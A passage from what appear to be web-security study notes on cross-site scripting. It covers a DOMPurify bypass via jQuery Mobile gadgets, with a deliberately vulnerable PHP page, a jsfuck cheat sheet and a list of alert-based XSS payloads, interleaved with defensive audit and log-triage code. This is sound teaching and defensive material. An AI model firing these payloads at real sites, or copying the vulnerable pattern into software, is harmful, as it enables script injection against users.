When there are many characters, CSS features such as ::first-line can be combined with this technique to narrow the range and retrieve more precise content.
3.2.8.2. Bypass Via Gadgets
3.2.8.2.1. Introduction

Some sites rely on whitelists or DOM-based defenses. Against these there is an attack technique known as Code Reuse that can bypass them. It resembles gadget-based techniques in binary exploitation: legitimate code already present in the target is used to get around the defensive measures. The paper "Code-Reuse Attacks for the Web: Breaking Cross-Site Scripting Mitigations via Gadgets" describes the method in detail.
Below is a simple example. The page is hardened with DOMPurify, but because jquery.mobile.js is also included, it can still be attacked.
3.2.8.2.2. Example
// index.php
<?php
$msg = $_GET['message'];
$msg = str_replace("\n", "", $msg);
$msg = base64_encode($msg);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Preview</title>
<script type="text/javascript" src="purify.js"></script>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="jquery.mobile.js"></script>
</head>
<body>
<script type="text/javascript">
var d = atob('<?php echo $msg; ?>');
var cleanvar = DOMPurify.sanitize(d);
document.write(cleanvar);
</script>
</body>
</html>
// payload
<div data-role=popup id='--><script>alert(1)</script>'></div>
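As an added example (not part of the original notes and not DOMPurify's or jQuery Mobile's own code), the following JavaScript shows the two defender-side checks this case calls for: an audit that lists the data-* attributes in already-sanitized markup that a widget library such as jQuery Mobile would act on, and the DOMPurify option ALLOW_DATA_ATTR: false, which removes them at sanitization time. The attribute names other than data-role, the sample markup and the function names are this example's own assumptions.

```javascript
// Added example: audit sanitized HTML for widget-library "gadget" attributes
// and show the DOMPurify option that removes them. Not code from the notes.

// Attribute names a widget library interprets as instructions. data-role is
// the one used in the example above; the others are constructed examples of
// the same class (assumption, not an exhaustive list).
const GADGET_ATTRIBUTES = ["data-role", "data-rel", "data-theme"];

// Scan each start tag in an HTML string and return the gadget attributes
// found. This is an audit helper, not a sanitizer: it only reads markup that
// DOMPurify has already cleaned. Quoted ">" inside attribute values is not
// handled, so use a real parser for anything beyond review tooling.
function findGadgetAttributes(html) {
  const findings = [];
  const tagRe = /<([a-zA-Z][\w-]*)\s+([^>]*)>/g;
  const attrRe = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    let attr;
    while ((attr = attrRe.exec(tag[2])) !== null) {
      const name = attr[1].toLowerCase();
      if (GADGET_ATTRIBUTES.includes(name)) {
        findings.push({
          tag: tag[1].toLowerCase(),
          attr: name,
          value: attr[2] ?? attr[3] ?? attr[4],
        });
      }
    }
  }
  return findings;
}

// DOMPurify configuration that drops every data-* attribute, so the widget
// library never sees attacker-controlled gadget markup. ALLOW_DATA_ATTR is a
// real DOMPurify option (it defaults to true).
const HARDENED_OPTIONS = { ALLOW_DATA_ATTR: false };

// `purifier` is the DOMPurify object loaded in the page (assumed).
function sanitizeWithoutGadgets(purifier, html) {
  return purifier.sanitize(html, HARDENED_OPTIONS);
}

// Constructed sample: markup that passes the default DOMPurify rules (no
// script, no event handlers) yet still carries a data-role gadget attribute.
const SAMPLE_SANITIZED =
  '<p>Preview</p><div data-role="popup" id="preview">text</div>';

// Usage in a review script:
// console.log(findGadgetAttributes(SAMPLE_SANITIZED));
// -> [{ tag: "div", attr: "data-role", value: "popup" }]
```

Run the audit against the output of DOMPurify.sanitize rather than the raw input: the point of the gadget attack is that the markup is clean by the sanitizer's rules, so only a library-aware check, or a configuration that denies data-* attributes outright, catches it.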
3.2.8.3. jsfuck cheat sheet
3.2.8.3.1. Basic values
- undefined > [][[]]
- false > ![]
- true > !![]
- NaN > +[![]]
- 0 > +[]
- 1 > +!+[]
- 2 > !+[]+!+[]
- '' > []+[]
- 'undefined' > []+[][[]]
- 'false' > []+![]
- 'true' > []+!![]
- 'NaN' > []+(+[![]])
- '0' > []+(+[])
- '1' > []+(+!+[])
- '2' > []+(!+[]+!+[])
- '10' > [+!+[]]+[+[]]
- '11' > [+!+[]]+[+!+[]]
- '100' > [+!+[]]+[+[]]+(+[])
- 10 > +([+!+[]]+[+[]])
- 11 > +([+!+[]]+[+!+[]])
- 100 > +([+!+[]]+[+[]]+(+[]))
- 'a' > ([]+![])[+!+[]]
- 'd' > ([]+[][[]])[+!+[]+!+[]]
- 'e' > ([]+!+[])[+!+[]+!+[]+!+[]]
- 'f' > ([]+![])[+[]]
- 'i' > ([]+[][[]])[+!+[]+!+[]+!+[]+!+[]+!+[]]
- 'l' > ([]+![])[+!+[]+!+[]]
- 'n' > ([]+[][[]])[+!+[]]
- 'r' > ([]+!+[])[+!+[]]
- 's' > ([]+![])[+!+[]+!+[]+!+[]]
- 't' > ([]+!+[])[+[]]
- 'u' > ([]+!+[])[+!+[]+!+[]]
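As an added example (not part of the original notes), the following JavaScript checks the cheat sheet above by evaluating each primitive and comparing it with the listed value, and then uses the same six-character alphabet as a detection heuristic for request logs, where a long parameter made only of `[]()!+` is a strong sign of obfuscated script. The table subset, the sample parameters and the function names are this example's own.

```javascript
// Added example: verify jsfuck primitives from the cheat sheet and flag
// jsfuck-style values in logs. Not code from the notes.

// Expression -> expected value, copied from the cheat sheet above.
const JSFUCK_PRIMITIVES = [
  ["[][[]]", undefined],
  ["![]", false],
  ["!![]", true],
  ["+[![]]", NaN],
  ["+[]", 0],
  ["+!+[]", 1],
  ["!+[]+!+[]", 2],
  ["[]+[]", ""],
  ["[]+[][[]]", "undefined"],
  ["[]+![]", "false"],
  ["[]+!![]", "true"],
  ["[+!+[]]+[+[]]", "10"],
  ["+([+!+[]]+[+[]]+(+[]))", 100],
  ["([]+![])[+!+[]]", "a"],
  ["([]+[][[]])[+!+[]+!+[]+!+[]+!+[]+!+[]]", "i"],
  ["([]+!+[])[+[]]", "t"],
];

// The whole jsfuck alphabet.
const JSFUCK_ALPHABET = /^[\[\]()!+]+$/;

// Evaluate one expression. Only the six characters are allowed through, so
// this evaluator cannot be handed arbitrary code.
function evalJsfuck(expr) {
  if (!JSFUCK_ALPHABET.test(expr)) {
    throw new Error("not a jsfuck expression");
  }
  return Function("return (" + expr + ")")();
}

// Evaluate the table; returns the expressions whose value differs from the
// cheat sheet (Object.is so that NaN compares equal to NaN).
function verifyPrimitives(table = JSFUCK_PRIMITIVES) {
  return table
    .filter(([expr, expected]) => !Object.is(evalJsfuck(expr), expected))
    .map(([expr]) => expr);
}

// Detection heuristic for WAF/log review: a value of at least minLength
// characters drawn only from the alphabet is almost certainly obfuscated
// code, since ordinary user input never looks like that.
function looksLikeJsfuck(value, minLength = 12) {
  const s = value.replace(/\s+/g, "");
  return s.length >= minLength && JSFUCK_ALPHABET.test(s);
}

// Constructed sample query-string parameters.
const SAMPLE_PARAMS = [
  "q=hello world",
  "q=[1,2,3]",
  "q=([]+[][[]])[+!+[]+!+[]+!+[]+!+[]+!+[]]",
];

// Return the parameters whose value trips the heuristic.
function flagSuspiciousParams(lines = SAMPLE_PARAMS) {
  return lines.filter((line) =>
    looksLikeJsfuck(line.slice(line.indexOf("=") + 1)));
}
```

The heuristic is deliberately narrow: real jsfuck payloads are hundreds of characters long and contain nothing else, so a length floor plus the alphabet test gives very few false positives, while short bracket-only values such as `[]` are left alone.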
RPO (Relative Path Overwrite) attacks depend on how the browser and the web server respond to relative paths, exploiting the server's web caching behaviour and differences in configuration.
3.2.9. Payload
3.2.9.1. Common
- <script>alert(/xss/)</script>
- <svg onload=alert(document.domain)>
- <img src=document.domain onerror=alert(document.domain)>
- <M onmouseover=alert(document.domain)>M
- <marquee onscroll=alert(document.domain)>
- <a href=javascript:alert(document.domain)>M
- <body onload=alert(document.domain)>
- <details open ontoggle=alert(document.domain)>
- <embed src=javascript:alert(document.domain)>
- <script>alert(1)</script>
- <img src=1 onerror=alert(1)>
- <iMg src=1 onerror=alert(1)>
- <ImG src=1 onerror=alert(1)>
- <img src=1 onerror="alert(&quot;M&quot;)">
- <marquee onscroll=alert(1)>
- <mArQuEe OnScRoLl=alert(1)>
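As an added example (not part of the original notes), the following JavaScript is a triage helper for log or WAF review that normalises a request parameter the way a browser would tolerate it (URL decoding, HTML entity decoding, case folding) before matching the three patterns the list above relies on: script tags, inline event handlers on any tag, and javascript: URIs in href or src. The mixed-case entries in the list are exactly why the case folding step exists. The rule set, sample inputs and function names are this example's own.

```javascript
// Added example: normalise a parameter value and classify it against the
// XSS patterns shown in the payload list. Not code from the notes.

// Undo the transformations a browser applies before the markup is parsed,
// so that case or encoding tricks do not hide a pattern from the rules.
function normalise(value) {
  let s = value;
  try {
    s = decodeURIComponent(s);
  } catch (e) {
    // malformed percent-encoding: keep the raw value
  }
  s = s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&quot;/gi, '"')
    .replace(/&lt;/gi, "<")
    .replace(/&gt;/gi, ">");
  return s.toLowerCase();
}

// Each rule is applied to the normalised (lower-case) text.
const RULES = [
  { id: "script-tag", re: /<script[\s>\/]/ },
  { id: "event-handler", re: /<[a-z][^>]*\son[a-z]+\s*=/ },
  { id: "javascript-uri", re: /(href|src)\s*=\s*["']?\s*javascript:/ },
];

// Return the ids of every rule the value matches (empty array if none).
function classify(value) {
  const s = normalise(value);
  return RULES.filter((r) => r.re.test(s)).map((r) => r.id);
}

// Constructed sample values as they might appear in an access log.
const SAMPLE_INPUTS = [
  "hello <b>world</b>",
  "john@example.com",
  "<mArQuEe OnScRoLl=alert(1)>",
  "%3Cscript%3Ealert(1)%3C/script%3E",
  "<a href=javascript:alert(document.domain)>M",
  "<details open ontoggle=alert(document.domain)>",
];

// Map each sample to its rule hits; benign inputs map to [].
function triage(inputs = SAMPLE_INPUTS) {
  return inputs.map((v) => ({ value: v, hits: classify(v) }));
}
```

This is a review heuristic, not a defence: the page's own example shows that filtering input is the weaker control, and a payload can still slip past a pattern list. The fix that holds up is contextual output encoding (plus a sanitizer configured for the markup you actually need), with checks like this used only to spot probing in logs.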